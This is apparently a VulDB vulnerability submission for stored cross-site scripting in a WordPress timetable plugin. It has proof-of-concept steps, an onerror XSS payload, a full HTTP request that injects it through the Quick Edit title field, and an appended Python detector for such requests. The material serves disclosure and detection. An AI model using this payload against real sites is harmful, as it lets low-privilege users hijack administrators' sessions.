Submit #43712: Multiple Authenticated (contributor or higher user role) Stored Cross-Site Scripting (XSS) vulnerabilities in Timetable and Event Schedule by MotoPress info

Title: Multiple Authenticated (contributor or higher user role) Stored Cross-Site Scripting (XSS) vulnerabilities in Timetable and Event Schedule by MotoPress

Description:

# Multiple Authenticated (contributor or higher user role) Stored Cross-Site Scripting (XSS) vulnerabilities in Timetable and Event Schedule by MotoPress
# Exploit Author: Mostafa Farzaneh (Mr.pyweb)
# Web Site: https://motopress.com/
# Software Homepage: https://wordpress.org/plugins/mp-timetable/
# Version : 2.4.6
# Tested on: Windows 10
# Category: WebApp
# Date: 2022-05-24

# Description:
MotoPress Timetable and Event Schedule is an all-around organizer plugin developed to help you create and manage online schedules for a single or multiple events, customize the appearance of each event, add date, time, description and display all the needed items in a carefully-crafted timetable.
An authenticated user is able to inject arbitrary JavaScript or HTML code into the "Timetable page" through the Title parameter. This causes a Stored XSS attack against the administrators or the other authenticated users.

POC:
1- go to Timetable page
2- click on Quick Edit and change Title's value to "<img src=x onerror=alert`2`>" and click on update
3- click on view to run XSS payload

Request:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wp/wp-admin/edit.php?post_type=mp-event
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 432
Origin: http://127.0.0.1
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

post_title=%3Cimg+src%3Dx+onerror%3Dalert%603%60%3E&post_name=17&mm=05&jj=23&aa=2022&hh=18&mn=18&ss=01&post_author=1&post_password=&tax_input%5Bmp-event_category%5D%5B%5D=0&tax_input%5Bmp-event_category%5D%5B%5D=13&menu_order=0&tax_input%5Bmp-event_tag%5D=&comment_status=open&_status=publish&_inline_edit=f68c320526&post_view=list&screen=edit-mp-event&action=inline-save&post_type=mp-event&post_ID=17&edit_date=true&post_status=all
User: pyweb-security (UID 11883)
Submission: 15/08/2022 11:58 (4 years ago)
Moderation: 16/08/2022 15:42 (1 day later)
Status: accepted
VulDB entry: 206486 [MotoPress Timetable and Event Schedule on WordPress Quick Edit /wp-admin/admin-ajax.php post_title cross site scripting]
Points: 17
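
A detection sketch for the request pattern in the description above, added here as an example; it is not part of the submission or of the plugin. It decodes form-encoded bodies sent to /wp-admin/admin-ajax.php and flags Quick Edit saves (action=inline-save) whose post_title carries markup. The function names, the regular expressions and the shortened sample bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Markup that has no place in a plain-text event title.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z!][^>]*>?")
HANDLER_RE = re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)
SCHEME_RE = re.compile(r"\bjavascript\s*:", re.IGNORECASE)


def inspect_inline_save(body):
    """Return (post_id, findings) for one form-encoded admin-ajax.php body."""
    fields = parse_qs(body, keep_blank_values=True)
    post_id = fields.get("post_ID", ["?"])[0]
    if fields.get("action", [""])[0] != "inline-save":
        return post_id, []          # not a Quick Edit save
    findings = []
    for title in fields.get("post_title", []):   # parse_qs already URL-decodes
        if TAG_RE.search(title):
            findings.append("html-tag")
        if HANDLER_RE.search(title):
            findings.append("event-handler")
        if SCHEME_RE.search(title):
            findings.append("javascript-scheme")
    return post_id, findings


# Constructed sample bodies (shortened; parameter names as in the request above).
SAMPLES = [
    "post_title=%3Cimg+src%3Dx+onerror%3Dalert%603%60%3E&action=inline-save&post_type=mp-event&post_ID=17",
    "post_title=Yoga+class+%3C+10+people&action=inline-save&post_type=mp-event&post_ID=18",
    "post_title=%3Cimg+src%3Dx+onerror%3Dalert%603%60%3E&action=heartbeat&post_ID=19",
]


def scan(bodies):
    """Keep only the requests whose title carries markup."""
    results = (inspect_inline_save(b) for b in bodies)
    return [(pid, f) for pid, f in results if f]


if __name__ == "__main__":
    for pid, findings in scan(SAMPLES):
        print(f"post_ID={pid}: suspicious post_title ({', '.join(findings)})")
```

A hit identifies the post to review; the title "Yoga class < 10 people" is not flagged because a bare "<" followed by a digit does not open a tag.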
